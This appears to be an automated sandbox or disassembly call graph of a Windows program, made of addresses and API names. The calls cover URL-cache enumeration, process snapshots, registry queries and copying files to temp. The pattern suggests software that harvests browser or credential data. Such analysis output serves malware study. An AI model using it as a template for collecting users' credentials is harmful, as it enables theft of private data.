39020->39030 39033 4087b3 338 API calls 39022->39033 39023 445849 39488 40b1ab ??3@YAXPAX ??3@YAXPAX 39023->39488 39031 445c8b memset memset 39024->39031 39098 445cf0 39024->39098 39034 445bd4 39025->39034 39035 445b98 39025->39035 39038 40b2cc 27 API calls 39029->39038 39039 409d1f 6 API calls 39030->39039 39042 414c2e 16 API calls 39031->39042 39032 44589f 39489 40b1ab ??3@YAXPAX ??3@YAXPAX 39032->39489 39040 445621 39033->39040 39048 414c2e 16 API calls 39034->39048 39035->39034 39044 445ba2 39035->39044 39041 4459ac 39038->39041 39052 445919 39039->39052 39474 4454bf 20 API calls 39040->39474 39054 409d1f 6 API calls 39041->39054 39055 445cc9 39042->39055 39562 4099c6 wcslen 39044->39562 39047 40b2cc 27 API calls 39060 445a4f 39047->39060 39062 445be2 39048->39062 39049 403335 39189 4452e5 45 API calls 39049->39189 39050 445d3d 39082 40b2cc 27 API calls 39050->39082 39051 445d88 memset memset memset 39065 414c2e 16 API calls 39051->39065 39490 409b98 GetFileAttributesW 39052->39490 39053 445823 39053->39023 39064 4087b3 338 API calls 39053->39064 39066 4459bc 39054->39066 39067 409d1f 6 API calls 39055->39067 39057 445879 39057->39032 39078 4087b3 338 API calls 39057->39078 39059->39007 39083 44594a 39059->39083 39439 409d1f wcslen wcslen 39060->39439 39071 40b2cc 27 API calls 39062->39071 39064->39053 39075 445dde 39065->39075 39558 409b98 GetFileAttributesW 39066->39558 39077 445ce1 39067->39077 39068 445bb3 39565 445403 memset 39068->39565 39072 445bf3 39071->39072 39081 409d1f 6 API calls 39072->39081 39073 445928 39073->39083 39491 40b6ef 39073->39491 39084 40b2cc 27 API calls 39075->39084 39582 409b98 GetFileAttributesW 39077->39582 39078->39057 39092 445c07 39081->39092 39093 445d54 _wcsicmp 39082->39093 39083->39011 39097 4459ed 39083->39097 39096 445def 39084->39096 39085 4459cb 39085->39097 39106 40b6ef 252 API calls 39085->39106 39089 40b2cc 27 API calls 39090 445a94 39089->39090 39444 40ae18 39090->39444 39091 44566d 39091->39006 39361 413d4c 39091->39361 39102 445389 258 API calls 39092->39102 39103 445d71 39093->39103 39168 445d67 39093->39168 39095 445665 39475 40b1ab ??3@YAXPAX ??3@YAXPAX 39095->39475 39104 409d1f 6 API calls 39096->39104 39097->39017 39097->39018 39098->39049 39098->39050 39098->39051 39099 445389 258 API calls 39099->39024 39108 445c17 39102->39108 39583 445093 23 API calls 39103->39583 39111 445e03 39104->39111 39106->39097 39107 4456d8 39113 40b2cc 27 API calls 39107->39113 39114 40b2cc 27 API calls 39108->39114 39110 44563c 39110->39095 39116 4087b3 338 API calls 39110->39116 39584 409b98 GetFileAttributesW 39111->39584 39112 40b6ef 252 API calls 39112->39049 39118 4456e2 39113->39118 39119 445c23 39114->39119 39115 445d83 39115->39049 39116->39110 39477 413fa6 _wcsicmp _wcsicmp 39118->39477 39123 409d1f 6 API calls 39119->39123 39121 445e12 39128 445e6b 39121->39128 39134 40b2cc 27 API calls 39121->39134 39126 445c37 39123->39126 39124 445aa1 39127 445b17 39124->39127 39142 445ab2 memset 39124->39142 39155 409d1f 6 API calls 39124->39155 39451 40add4 39124->39451 39456 445389 39124->39456 39465 40ae51 39124->39465 39125 4456eb 39130 4456fd memset memset memset memset 39125->39130 39131 4457ea 39125->39131 39132 445389 258 API calls 39126->39132 39559 40aebe 39127->39559 39586 445093 23 API calls 39128->39586 39478 409c70 wcscpy wcsrchr 39130->39478 39481 413d29 39131->39481 39137 445c47 39132->39137 39138 445e33 39134->39138 39144 40b2cc 27 API calls 39137->39144 39145 409d1f 6 API calls 39138->39145 39140 445e7e 39141 445f67 39140->39141 39150 40b2cc 27 API calls 39141->39150 39146 40b2cc 27 API calls 39142->39146 39148 445c53 39144->39148 39149 445e47 39145->39149 39146->39124 39147 409c70 2 API calls 39151 44577e 39147->39151 39152 409d1f 6 API calls 39148->39152 39585 409b98 GetFileAttributesW 39149->39585 39154 445f73 39150->39154 39156 409c70 2 API calls 39151->39156 39157 445c67 39152->39157 39159 409d1f 6 API calls 39154->39159 39155->39124 39161 445389 258 API calls 39157->39161 39158 445e56 39158->39128 39164 445e83 memset 39158->39164 39162 445f87 39159->39162 39161->39024 39589 409b98 GetFileAttributesW 39162->39589 39166 40b2cc 27 API calls 39164->39166 39169 445eab 39166->39169 39168->39049 39168->39112 39171 409d1f 6 API calls 39169->39171 39173 445ebf 39171->39173 39175 40ae18 9 API calls 39173->39175 39185 445ef5 39175->39185 39178 40ae51 9 API calls 39178->39185 39180 445f5c 39182 40aebe FindClose 39180->39182 39181 40add4 2 API calls 39181->39185 39182->39141 39183 40b2cc 27 API calls 39183->39185 39184 409d1f 6 API calls 39184->39185 39185->39178 39185->39180 39185->39181 39185->39183 39185->39184 39187 445f3a 39185->39187 39587 409b98 GetFileAttributesW 39185->39587 39588 445093 23 API calls 39187->39588 39189->38988 39190->38990 39191->38988 39192->38983 39194 40c775 39193->39194 39590 40b1ab ??3@YAXPAX ??3@YAXPAX 39194->39590 39196 40c788 39591 40b1ab ??3@YAXPAX ??3@YAXPAX 39196->39591 39198 40c790 39592 40b1ab ??3@YAXPAX ??3@YAXPAX 39198->39592 39200 40c798 39201 40aa04 ??3@YAXPAX 39200->39201 39202 40c7a0 39201->39202 39593 40c274 memset 39202->39593 39207 40a8ab 9 API calls 39208 40c7c3 39207->39208 39209 40a8ab 9 API calls 39208->39209 39210 40c7d0 39209->39210 39622 40c3c3 39210->39622 39214 40c7e5 39215 40c877 39214->39215 39216 40c86c 39214->39216 39222 40c634 49 API calls 39214->39222 39647 40a706 39214->39647 39223 40bdb0 39215->39223 39664 4053fe 39 API calls 39216->39664 39222->39214 39854 404363 39223->39854 39277 40399d 39276->39277 39920 403a16 39277->39920 39279 403a09 39934 40b1ab ??3@YAXPAX ??3@YAXPAX 39279->39934 39281 403a12 wcsrchr 39281->39012 39282 4039a3 39282->39279 39285 4039f4 39282->39285 39931 40a02c CreateFileW 39282->39931 39285->39279 39286 4099c6 2 API calls 39285->39286 39286->39279 39288 414c2e 16 API calls 39287->39288 39289 404048 39288->39289 39290 414c2e 16 API calls 39289->39290 39291 404056 39290->39291 39292 409d1f 6 API calls 39291->39292 39293 404073 39292->39293 39294 409d1f 6 API calls 39293->39294 39295 40408e 39294->39295 39296 409d1f 6 API calls 39295->39296 39297 4040a6 39296->39297 39298 403af5 20 API calls 39297->39298 39299 4040ba 39298->39299 39300 403af5 20 API calls 39299->39300 39301 4040cb 39300->39301 39961 40414f memset 39301->39961 39303 404140 39305 4040ec memset 39308 4040e0 39305->39308 39307 4099c6 2 API calls 39307->39308 39308->39303 39308->39305 39308->39307 39309 40a8ab 9 API calls 39308->39309 39309->39308 39362 40b633 ??3@YAXPAX 39361->39362 39363 413d65 CreateToolhelp32Snapshot memset Process32FirstW 39362->39363 39364 413f00 Process32NextW 39363->39364 39365 413da5 OpenProcess 39364->39365 39366 413f17 CloseHandle 39364->39366 39367 413df3 memset 39365->39367 39370 413eb0 39365->39370 39366->39107 40228 413f27 39367->40228 39369 413ebf ??3@YAXPAX 39369->39370 39370->39364 39370->39369 39371 4099f4 3 API calls 39370->39371 39371->39370 39373 413e37 GetModuleHandleW 39374 413e1f 39373->39374 39375 413e46 GetProcAddress 39373->39375 39374->39373 40233 413959 39374->40233 40249 413ca4 39374->40249 39375->39374 39377 413ea2 CloseHandle 39377->39370 39379 414c2e 16 API calls 39378->39379 39380 403eb7 39379->39380 39381 414c2e 16 API calls 39380->39381 39382 403ec5 39381->39382 39383 409d1f 6 API calls 39382->39383 39384 403ee2 39383->39384 39385 409d1f 6 API calls 39384->39385 39386 403efd 39385->39386 39387 409d1f 6 API calls 39386->39387 39388 403f15 39387->39388 39389 403af5 20 API calls 39388->39389 39390 403f29 39389->39390 39391 403af5 20 API calls 39390->39391 39392 403f3a 39391->39392 39393 40414f 33 API calls 39392->39393 39398 403f4f 39393->39398 39394 403faf 40263 40b1ab ??3@YAXPAX ??3@YAXPAX 39394->40263 39396 403f5b memset 39396->39398 39397 403fb7 39397->39053 39398->39394 39398->39396 39399 4099c6 2 API calls 39398->39399 39400 40a8ab 9 API calls 39398->39400 39399->39398 39400->39398 39402 414c2e 16 API calls 39401->39402 39403 403d26 39402->39403 39404 414c2e 16 API calls 39403->39404 39405 403d34 39404->39405 39406 409d1f 6 API calls 39405->39406 39407 403d51 39406->39407 39408 409d1f 6 API calls 39407->39408 39409 403d6c 39408->39409 39410 409d1f 6 API calls 39409->39410 39411 403d84 39410->39411 39412 403af5 20 API calls 39411->39412 39413 403d98 39412->39413 39414 403af5 20 API calls 39413->39414 39415 403da9 39414->39415 39416 40414f 33 API calls 39415->39416 39417 403dbe 39416->39417 39418 403e1e 39417->39418 39419 403dca memset 39417->39419 39422 4099c6 2 API calls 39417->39422 39423 40a8ab 9 API calls 39417->39423 40264 40b1ab ??3@YAXPAX ??3@YAXPAX 39418->40264 39419->39417 39421 403e26 39421->39057 39422->39417 39423->39417 39425 414b81 9 API calls 39424->39425 39426 414c40 39425->39426 39427 414c73 memset 39426->39427 40265 409cea 39426->40265 39428 414c94 39427->39428 40268 414592 RegOpenKeyExW 39428->40268 39431 414c64 39431->39047 39433 414cc1 39434 414cf4 wcscpy 39433->39434 40269 414bb0 wcscpy 39433->40269 39434->39431 39436 414cd2 40270 4145ac RegQueryValueExW 39436->40270 39438 414ce9 RegCloseKey 39438->39434 39440 409d62 39439->39440 39441 409d43 wcscpy 39439->39441 39440->39089 39442 409719 2 API calls 39441->39442 39443 409d51 wcscat 39442->39443 39443->39440 39445 40aebe FindClose 39444->39445 39446 40ae21 39445->39446 39447 4099c6 2 API calls 39446->39447 39448 40ae35 39447->39448 39449 409d1f 6 API calls 39448->39449 39450 40ae49 39449->39450 39450->39124 39452 40ade0 39451->39452 39453 40ae0f 39451->39453 39452->39453 39454 40ade7 wcscmp 39452->39454 39453->39124 39454->39453 39455 40adfe wcscmp 39454->39455 39455->39453 39457 40ae18 9 API calls 39456->39457 39459 4453c4 39457->39459 39458 40ae51 9 API calls 39458->39459 39459->39458 39460 4453f3 39459->39460 39461 40add4 2 API calls 39459->39461 39464 445403 253 API calls 39459->39464 39462 40aebe FindClose 39460->39462 39461->39459 39463 4453fe 39462->39463 39463->39124 39464->39459 39466 40ae7b FindNextFileW 39465->39466 39467 40ae5c FindFirstFileW 39465->39467 39468 40ae94 39466->39468 39469 40ae8f 39466->39469 39467->39468 39471 40aeb6 39468->39471 39472 409d1f 6 API calls 39468->39472 39470 40aebe FindClose 39469->39470 39470->39468 39471->39124 39472->39471 39474->39110 39475->39091 39477->39125 39479 409c89 39478->39479 39479->39147 39482 413d39 39481->39482 39483 413d2f FreeLibrary 39481->39483 39484 40b633 ??3@YAXPAX 39482->39484 39483->39482 39485 413d42 39484->39485 39488->39009 39489->39059 39490->39073 39492 44db70 39491->39492 39493 40b6fc memset 39492->39493 39494 409c70 2 API calls 39493->39494 39495 40b732 wcsrchr 39494->39495 39496 40b743 39495->39496 39497 40b746 memset 39495->39497 39496->39497 39498 40b2cc 27 API calls 39497->39498 39499 40b76f 39498->39499 39500 409d1f 6 API calls 39499->39500 39501 40b783 39500->39501 40271 409b98 GetFileAttributesW 39501->40271 39503 40b792 39504 40b7c2 39503->39504 39505 409c70 2 API calls 39503->39505 40272 40bb98 39504->40272 39507 40b7a5 39505->39507 39509 40b2cc 27 API calls 39507->39509 39513 40b7b2 39509->39513 39510 40b837 FindCloseChangeNotification 39512 40b83e memset 39510->39512 39511 40b817 40317 409a45 GetTempPathW 39511->40317 40305 40a6e6 WideCharToMultiByte 39512->40305 39516 409d1f 6 API calls 39513->39516 39516->39504 39517 40b827 CopyFileW 39517->39512 39518 40b866 39519 444432 121 API calls 39518->39519 39520 40b879 39519->39520 39521 40bad5 39520->39521 39522 40b273 27 API calls 39520->39522 39523 40baeb 39521->39523 39524 40bade DeleteFileW 39521->39524 39525 40b89a 39522->39525 39526 40b04b ??3@YAXPAX 39523->39526 39524->39523 39527 438552 134 API calls 39525->39527 39528 40baf3 39526->39528 39529 40b8a4 39527->39529 39528->39083 39530 40bacd 39529->39530 39532 4251c4 137 API calls 39529->39532 39531 443d90 111 API calls 39530->39531 39531->39521 39555 40b8b8 39532->39555 39533 40bac6 40324 424f26 123 API calls 39533->40324 39534 40b8bd memset 39536 425413 17 API calls 39534->39536 39536->39555 39537 425413 17 API calls 39537->39555 39540 40a71b MultiByteToWideChar 39540->39555 39541 40a734 MultiByteToWideChar 39541->39555 39542 4253af 17 API calls 39542->39555 39543 4253cf 17 API calls 39543->39555 39544 40b9b5 memcmp 39544->39555 39545 4099c6 2 API calls 39545->39555 39546 404423 37 API calls 39546->39555 39548 40bb3e memset memcpy 40325 40a734 MultiByteToWideChar 39548->40325 39549 4251c4 137 API calls 39549->39555 39552 40bb88 LocalFree 39552->39555 39555->39533 39555->39534 39555->39537 39555->39540 39555->39541 39555->39542 39555->39543 39555->39544 39555->39545 39555->39546 39555->39548 39555->39549 39556 40ba5f memcmp 39555->39556 39557 4099f4 3 API calls 39555->39557 40306 4253ef 39555->40306 40311 40b64c 39555->40311 40320 447280 memset 39555->40320 40321 447960 memset memcpy memcpy memcpy 39555->40321 40322 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 39555->40322 40323 447920 memcpy memcpy memcpy 39555->40323 39556->39555 39557->39555 39558->39085 39560 40aed1 39559->39560 39561 40aec7 FindClose 39559->39561 39560->39018 39561->39560 39563 4099d7 39562->39563 39564 4099da memcpy 39562->39564 39563->39564 39564->39068 39566 40b2cc 27 API calls 39565->39566 39567 44543f 39566->39567 39568 409d1f 6 API calls 39567->39568 39569 44544f 39568->39569 40418 409b98 GetFileAttributesW 39569->40418 39571 44545e 39572 445476 39571->39572 39573 40b6ef 252 API calls 39571->39573 39574 40b2cc 27 API calls 39572->39574 39573->39572 39575 445482 39574->39575 39576 409d1f 6 API calls 39575->39576 39577 445492 39576->39577 40419 409b98 GetFileAttributesW 39577->40419 39579 4454a1 39580 4454b9 39579->39580 39581 40b6ef 252 API calls 39579->39581 39580->39099 39581->39580 39582->39098 39583->39115 39584->39121 39585->39158 39586->39140 39587->39185 39588->39185 39589->39168 39590->39196 39591->39198 39592->39200 39594 414c2e 16 API calls 39593->39594 39595 40c2ae 39594->39595 39665 40c1d3 39595->39665 39600 40c3be 39617 40a8ab 39600->39617 39601 40afcf 2 API calls 39602 40c2fd FindFirstUrlCacheEntryW 39601->39602 39603 40c3b6 39602->39603 39604 40c31e wcschr 39602->39604 39605 40b04b ??3@YAXPAX 39603->39605 39606 40c331 39604->39606 39607 40c35e FindNextUrlCacheEntryW 39604->39607 39605->39600 39608 40a8ab 9 API calls 39606->39608 39607->39604 39609 40c373 GetLastError 39607->39609 39612 40c33e wcschr 39608->39612 39610 40c3ad FindCloseUrlCache 39609->39610 39611 40c37e 39609->39611 39610->39603 39613 40afcf 2 API calls 39611->39613 39612->39607 39614 40c34f 39612->39614 39615 40c391 FindNextUrlCacheEntryW 39613->39615 39616 40a8ab 9 API calls 39614->39616 39615->39604 39615->39610 39616->39607 39781 40a97a 39617->39781 39620 40a8cc 39620->39207 39621 40a8d0 7 API calls 39621->39620 39786 40b1ab ??3@YAXPAX ??3@YAXPAX 39622->39786 39624 40c3dd 39625 40b2cc 27 API calls 39624->39625 39626 40c3e7 39625->39626 39787 414592 RegOpenKeyExW 39626->39787 39628 40c3f4 39629 40c50e 39628->39629 39630 40c3ff 39628->39630 39644 405337 39629->39644 39631 40a9ce 4 API calls 39630->39631 39632 40c418 memset 39631->39632 39788 40aa1d 39632->39788 39635 40c471 39637 40c47a _wcsupr 39635->39637 39636 40c505 RegCloseKey 39636->39629 39638 40a8d0 7 API calls 39637->39638 39639 40c498 39638->39639 39790 405220 39644->39790 39648 4099c6 2 API calls 39647->39648 39649 40a714 _wcslwr 39648->39649 39650 40c634 39649->39650 39847 405361 39650->39847 39664->39215 39666 40ae18 9 API calls 39665->39666 39672 40c210 39666->39672 39667 40ae51 9 API calls 39667->39672 39668 40c264 39669 40aebe FindClose 39668->39669 39671 40c26f 39669->39671 39670 40add4 2 API calls 39670->39672 39677 40e5ed memset memset 39671->39677 39672->39667 39672->39668 39672->39670 39673 40c231 _wcsicmp 39672->39673 39674 40c1d3 35 API calls 39672->39674 39673->39672 39675 40c248 39673->39675 39674->39672 39690 40c084 22 API calls 39675->39690 39678 414c2e 16 API calls 39677->39678 39679 40e63f 39678->39679 39680 409d1f 6 API calls 39679->39680 39681 40e658 39680->39681 39691 409b98 GetFileAttributesW 39681->39691 39683 40e667 39685 409d1f 6 API calls 39683->39685 39686 40e680 39683->39686 39685->39686 39692 409b98 GetFileAttributesW 39686->39692 39687 40e68f 39688 40c2d8 39687->39688 39693 40e4b2 39687->39693 39688->39600 39688->39601 39690->39672 39691->39683 39692->39687 39714 40e01e 39693->39714 39695 40e593 39696 40e5b0 39695->39696 39697 40e59c DeleteFileW 39695->39697 39698 40b04b ??3@YAXPAX 39696->39698 39697->39696 39700 40e5bb 39698->39700 39699 40e521 39699->39695 39737 40e175 39699->39737 39702 40e5c4 CloseHandle 39700->39702 39703 40e5cc 39700->39703 39702->39703 39705 40b633 ??3@YAXPAX 39703->39705 39704 40e573 39706 40e584 39704->39706 39707 40e57c FindCloseChangeNotification 39704->39707 39708 40e5db 39705->39708 39780 40b1ab ??3@YAXPAX ??3@YAXPAX 39706->39780 39707->39706 39711 40b633 ??3@YAXPAX 39708->39711 39710 40e540 39710->39704 39757 40e2ab 39710->39757 39712 40e5e3 39711->39712 39712->39688 39715 406214 22 API calls 39714->39715 39716 40e03c 39715->39716 39717 40e16b 39716->39717 39718 40dd85 74 API calls 39716->39718 39717->39699 39719 40e06b 39718->39719 39719->39717 39720 40afcf ??2@YAPAXI ??3@YAXPAX 39719->39720 39721 40e08d OpenProcess 39720->39721 39722 40e0a4 GetCurrentProcess DuplicateHandle 39721->39722 39726 40e152 39721->39726 39723 40e0d0 GetFileSize 39722->39723 39724 40e14a CloseHandle 39722->39724 39727 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39723->39727 39724->39726 39725 40e160 39729 40b04b ??3@YAXPAX 39725->39729 39726->39725 39728 406214 22 API calls 39726->39728 39730 40e0ea 39727->39730 39728->39725 39729->39717 39731 4096dc CreateFileW 39730->39731 39732 40e0f1 CreateFileMappingW 39731->39732 39733 40e140 CloseHandle CloseHandle 39732->39733 39734 40e10b MapViewOfFile 39732->39734 39733->39724 39735 40e13b FindCloseChangeNotification 39734->39735 39736 40e11f WriteFile UnmapViewOfFile 39734->39736 39735->39733 39736->39735 39738 40e18c 39737->39738 39739 406b90 11 API calls 39738->39739 39740 40e19f 39739->39740 39741 40e1a7 memset 39740->39741 39742 40e299 39740->39742 39747 40e1e8 39741->39747 39743 4069a3 ??3@YAXPAX ??3@YAXPAX 39742->39743 39744 40e2a4 39743->39744 39744->39710 39745 406e8f 13 API calls 39745->39747 39746 406b53 SetFilePointerEx ReadFile 39746->39747 39747->39745 39747->39746 39748 40e283 39747->39748 39749 40dd50 _wcsicmp 39747->39749 39753 40742e 8 API calls 39747->39753 39754 40aae3 wcslen wcslen _memicmp 39747->39754 39755 40e244 _snwprintf 39747->39755 39750 40e291 39748->39750 39751 40e288 ??3@YAXPAX 39748->39751 39749->39747 39752 40aa04 ??3@YAXPAX 39750->39752 39751->39750 39752->39742 39753->39747 39754->39747 39756 40a8d0 7 API calls 39755->39756 39756->39747 39758 40e2c2 39757->39758 39759 406b90 11 API calls 39758->39759 39770 40e2d3 39759->39770 39760 40e4a0 39761 4069a3 ??3@YAXPAX ??3@YAXPAX 39760->39761 39763 40e4ab 39761->39763 39762 406e8f 13 API calls 39762->39770 39763->39710 39764 406b53 SetFilePointerEx ReadFile 39764->39770 39765 40e489 39766 40aa04 ??3@YAXPAX 39765->39766 39768 40e491 39766->39768 39767 40dd50 _wcsicmp 39767->39770 39768->39760 39769 40e497 ??3@YAXPAX 39768->39769 39769->39760 39770->39760 39770->39762 39770->39764 39770->39765 39770->39767 39771 40dd50 _wcsicmp 39770->39771 39774 40742e 8 API calls 39770->39774 39775 40e3e0 memcpy 39770->39775 39776 40e3b3 wcschr 39770->39776 39777 40e3fb memcpy 39770->39777 39778 40e416 memcpy 39770->39778 39779 40e431 memcpy 39770->39779 39772 40e376 memset 39771->39772 39773 40aa29 6 API calls 39772->39773 39773->39770 39774->39770 39775->39770 39776->39770 39777->39770 39778->39770 39779->39770 39780->39695 39783 40a980 39781->39783 39782 40a8bb 39782->39620 39782->39621 39783->39782 39784 40a995 _wcsicmp 39783->39784 39785 40a99c wcscmp 39783->39785 39784->39783 39785->39783 39786->39624 39787->39628 39789 40aa23 RegEnumValueW 39788->39789 39789->39635 39789->39636 39791 405335 39790->39791 39792 40522a 39790->39792 39791->39214 39793 40b2cc 27 API calls 39792->39793 39794 405234 39793->39794 39795 40a804 8 API calls 39794->39795 39796 40523a 39795->39796 39835 40b273 39796->39835 39855 40440c FreeLibrary 39854->39855 39856 40436d 39855->39856 39921 403a29 39920->39921 39935 403bed memset memset 39921->39935 39923 403ae7 39948 40b1ab ??3@YAXPAX ??3@YAXPAX 39923->39948 39924 403a3f memset 39929 403a2f 39924->39929 39926 403aef 39926->39282 39927 409d1f 6 API calls 39927->39929 39928 409b98 GetFileAttributesW 39928->39929 39929->39923 39929->39924 39929->39927 39929->39928 39930 40a8d0 7 API calls 39929->39930 39930->39929 39932 40a051 GetFileTime FindCloseChangeNotification 39931->39932 39933 4039ca CompareFileTime 39931->39933 39932->39933 39933->39282 39934->39281 39936 414c2e 16 API calls 39935->39936 39937 403c38 39936->39937 39938 409719 2 API calls 39937->39938 39939 403c3f wcscat 39938->39939 39940 414c2e 16 API calls 39939->39940 39941 403c61 39940->39941 39942 409719 2 API calls 39941->39942 39943 403c68 wcscat 39942->39943 39949 403af5 39943->39949 39946 403af5 20 API calls 39947 403c95 39946->39947 39947->39929 39948->39926 39950 403b02 39949->39950 39951 40ae18 9 API calls 39950->39951 39959 403b37 39951->39959 39952 403bdb 39954 40aebe FindClose 39952->39954 39953 40add4 wcscmp wcscmp 39953->39959 39955 403be6 39954->39955 39955->39946 39956 40ae18 9 API calls 39956->39959 39957 40ae51 9 API calls 39957->39959 39958 40aebe FindClose 39958->39959 39959->39952 39959->39953 39959->39956 39959->39957 39959->39958 39960 40a8d0 7 API calls 39959->39960 39960->39959 39962 409d1f 6 API calls 39961->39962 39963 404190 39962->39963 39976 409b98 GetFileAttributesW 39963->39976 39965 40419c 39966 4041a7 6 API calls 39965->39966 39967 40435c 39965->39967 39968 40424f 39966->39968 39967->39308 39968->39967 39970 40425e memset 39968->39970 39972 409d1f 6 API calls 39968->39972 39973 40a8ab 9 API calls 39968->39973 39977 414842 39968->39977 39970->39968 39972->39968 39976->39965 40255 413f4f 40228->40255 40231 413f37 K32GetModuleFileNameExW 40232 413f4a 40231->40232 40232->39374 40234 413969 wcscpy 40233->40234 40235 41396c wcschr 40233->40235 40247 413a3a 40234->40247 40235->40234 40237 41398e 40235->40237 40260 4097f7 wcslen wcslen _memicmp 40237->40260 40239 41399a 40247->39374 40250 413cb0 GetModuleHandleW 40249->40250 40251 413cda 40249->40251 40250->40251 40252 413cbf GetProcAddress 40250->40252 40253 413ce3 GetProcessTimes 40251->40253 40254 413cf6 40251->40254 40252->40251 40253->39377 40254->39377 40256 413f2f 40255->40256 40257 413f54 40255->40257 40256->40231 40256->40232 40258 40a804 8 API calls 40257->40258 40259 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 40258->40259 40259->40256 40260->40239 40263->39397 40264->39421 40266 409cf9 GetVersionExW 40265->40266 40267 409d0a 40265->40267 40266->40267 40267->39427 40267->39431 40268->39433 40269->39436 40270->39438 40271->39503 40273 40bba5 40272->40273 40326 40cc26 40273->40326 40276 40bd4b 40347 40cc0c 40276->40347 40281 40b2cc 27 API calls 40282 40bbef 40281->40282 40354 40ccf0 _wcsicmp 40282->40354 40284 40bbf5 40284->40276 40355 40ccb4 6 API calls 40284->40355 40286 40bc26 40287 40cf04 17 API calls 40286->40287 40288 40bc2e 40287->40288 40289 40bd43 40288->40289 40290 40b2cc 27 API calls 40288->40290 40291 40cc0c 4 API calls 40289->40291 40292 40bc40 40290->40292 40291->40276 40356 40ccf0 _wcsicmp 40292->40356 40294 40bc46 40294->40289 40295 40bc61 memset memset WideCharToMultiByte 40294->40295 40357 40103c strlen 40295->40357 40297 40bcc0 40298 40b273 27 API calls 40297->40298 40299 40bcd0 memcmp 40298->40299 40299->40289 40300 40bce2 40299->40300 40301 404423 37 API calls 40300->40301 40305->39518 40307 42533e 16 API calls 40306->40307 40308 4253fb 40307->40308 40309 42538f 16 API calls 40308->40309 40310 42540b 40309->40310 40310->39555 40312 40b65c 40311->40312 40313 40b697 SystemTimeToFileTime 40312->40313 40316 40b681 40312->40316 40417 44d9c0 40313->40417 40315 40b6d6 FileTimeToLocalFileTime 40315->40316 40316->39555 40318 409a74 GetTempFileNameW 40317->40318 40319 409a66 GetWindowsDirectoryW 40317->40319 40318->39517 40319->40318 40320->39555 40321->39555 40322->39555 40323->39555 40324->39530 40325->39552 40358 4096c3 CreateFileW 40326->40358 40328 40cc34 40329 40cc3d GetFileSize 40328->40329 40330 40bbca 40328->40330 40331 40afcf 2 API calls 40329->40331 40330->40276 40338 40cf04 40330->40338 40332 40cc64 40331->40332 40359 40a2ef ReadFile 40332->40359 40334 40cc71 40360 40ab4a MultiByteToWideChar 40334->40360 40336 40cc95 FindCloseChangeNotification 40337 40b04b ??3@YAXPAX 40336->40337 40337->40330 40339 40b633 ??3@YAXPAX 40338->40339 40340 40cf14 40339->40340 40366 40b1ab ??3@YAXPAX ??3@YAXPAX 40340->40366 40342 40bbdd 40342->40276 40342->40281 40343 40cf1b 40343->40342 40345 40cfef 40343->40345 40367 40cd4b 40343->40367 40346 40cd4b 14 API calls 40345->40346 40346->40342 40348 40b633 ??3@YAXPAX 40347->40348 40349 40cc15 40348->40349 40350 40aa04 ??3@YAXPAX 40349->40350 40351 40cc1d 40350->40351 40416 40b1ab ??3@YAXPAX ??3@YAXPAX 40351->40416 40353 40b7d4 memset CreateFileW 40353->39510 40353->39511 40354->40284 40355->40286 40356->40294 40357->40297 40358->40328 40359->40334 40361 40ab6b 40360->40361 40365 40ab93 40360->40365 40362 40a9ce 4 API calls 40361->40362 40363 40ab74 40362->40363 40364 40ab7c MultiByteToWideChar 40363->40364 40364->40365 40365->40336 40366->40343 40368 40cd7b 40367->40368 40401 40aa29 40368->40401 40370 40cef5 40371 40aa04 ??3@YAXPAX 40370->40371 40372 40cefd 40371->40372 40372->40343 40374 40aa29 6 API calls 40375 40ce1d 40374->40375 40376 40aa29 6 API calls 40375->40376 40377 40ce3e 40376->40377 40378 40ce6a 40377->40378 40409 40abb7 wcslen memmove 40377->40409 40379 40ce9f 40378->40379 40412 40abb7 wcslen memmove 40378->40412 40381 40a8d0 7 API calls 40379->40381 40384 40ceb5 40381->40384 40382 40ce56 40410 40aa71 wcslen 40382->40410 40391 40a8d0 7 API calls 40384->40391 40386 40ce8b 40413 40aa71 wcslen 40386->40413 40388 40ce5e 40411 40abb7 wcslen memmove 40388->40411 40389 40ce93 40414 40abb7 wcslen memmove 40389->40414 40393 40cecb 40391->40393 40415 40d00b malloc memcpy ??3@YAXPAX ??3@YAXPAX 40393->40415 40395 40cedd 40396 40aa04 ??3@YAXPAX 40395->40396 40397 40cee5 40396->40397 40398 40aa04 ??3@YAXPAX 40397->40398 40399 40ceed 40398->40399 40402 40aa33 40401->40402 40408 40aa63 40401->40408 40403 40aa44 40402->40403 40404 40aa38 wcslen 40402->40404 40405 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 40403->40405 40404->40403 40406 40aa4d 40405->40406 40407 40aa51 memcpy 40406->40407 40406->40408 40407->40408 40408->40370 40408->40374 40409->40382 40410->40388 40411->40378 40412->40386 40413->40389 40414->40379 40415->40395 40416->40353 40417->40315 40418->39571 40419->39579 40429 44def7 40430 44df07 40429->40430 40431 44df00 ??3@YAXPAX 40429->40431 40432 44df17 40430->40432 40433 44df10 ??3@YAXPAX 40430->40433 40431->40430 40434 44df27 40432->40434 40435 44df20 ??3@YAXPAX 40432->40435 40433->40432 40436 44df37 40434->40436 40437 44df30 ??3@YAXPAX 40434->40437 40435->40434 40437->40436 37671 44dea5 37672 44deb5 FreeLibrary 37671->37672 37673 44dec3 37671->37673 37672->37673 40438 40b0b5 ??3@YAXPAX ??3@YAXPAX 40439 4148b6 FindResourceW 40440 4148f9 40439->40440 40441 4148cf SizeofResource 40439->40441 40441->40440 40442 4148e0 LoadResource 40441->40442 40442->40440 40443 4148ee LockResource 40442->40443 40443->40440 40444 441b3f 40454 43a9f6 40444->40454 40446 441b61 40627 4386af memset 40446->40627 40448 44189a 40449 4418e2 40448->40449 40451 442bd4 40448->40451 40452 4418ea 40449->40452 40628 4414a9 12 API calls 40449->40628 40451->40452 40629 441409 memset 40451->40629 40455 43aa20 40454->40455 40456 43aadf 40454->40456 40455->40456 40457 43aa34 memset 40455->40457 40456->40446 40458 43aa56 40457->40458 40459 43aa4d 40457->40459 40630 43a6e7 40458->40630 40638 42c02e memset 40459->40638 40464 43aad3 40640 4169a7 11 API calls 40464->40640 40465 43aaae 40465->40456 40465->40464 40480 43aae5 40465->40480 40466 43ac18 40469 43ac47 40466->40469 40642 42bbd5 memcpy memcpy memcpy memset memcpy 40466->40642 40470 43aca8 40469->40470 40643 438eed 16 API calls 40469->40643 40474 43acd5 40470->40474 40645 4233ae 11 API calls 40470->40645 40473 43ac87 40644 4233c5 16 API calls 40473->40644 40646 423426 11 